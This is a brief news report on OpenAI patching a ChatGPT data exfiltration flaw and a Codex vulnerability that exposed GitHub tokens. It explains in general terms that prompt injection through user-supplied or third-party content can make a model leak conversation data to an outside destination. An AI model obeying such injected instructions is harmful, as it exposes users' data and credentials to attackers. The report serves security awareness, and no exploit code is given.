OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

OpenAI has patched two security vulnerabilities affecting its products: a data exfiltration flaw in ChatGPT and a separate vulnerability in Codex that exposed GitHub authentication tokens, according to a report by The Hacker News. The ChatGPT data exfiltration vulnerability would have allowed an attacker to craft inputs that caused the model to leak user data or conversation contents to an external destination. Data exfiltration vulnerabilities in AI chat interfaces typically exploit the model's ability to make requests or render content by injecting malicious instructions through user-supplied or third-party content, a class of attack known as prompt injection. The Codex vulnerability involved GitHub access tokens, which are used by developers to authenticate to GitHub's API for operations including reading and writing code repositories. A compromised token could give an attacker access to the private code repositories and organizational resources of affected developers, with the scope depending on the permissions granted to the exposed token. OpenAI did not disclose the researchers who identified the vulnerabilities or whether either flaw had been exploited in the wild before the patches were applied. The company has a public vulnerability disclosure policy and a bug bounty program. The disclosures add to a growing body of security research focused specifically on AI systems as attack surfaces. Researchers have identified prompt injection, training data extraction, and model inversion as distinct vulnerability classes that do not map cleanly to traditional software security frameworks. Codex is OpenAI's code-generation model, available via API and embedded within GitHub Copilot. Its integration with developer workflows and source code repositories makes credential exposure through Codex particularly consequential.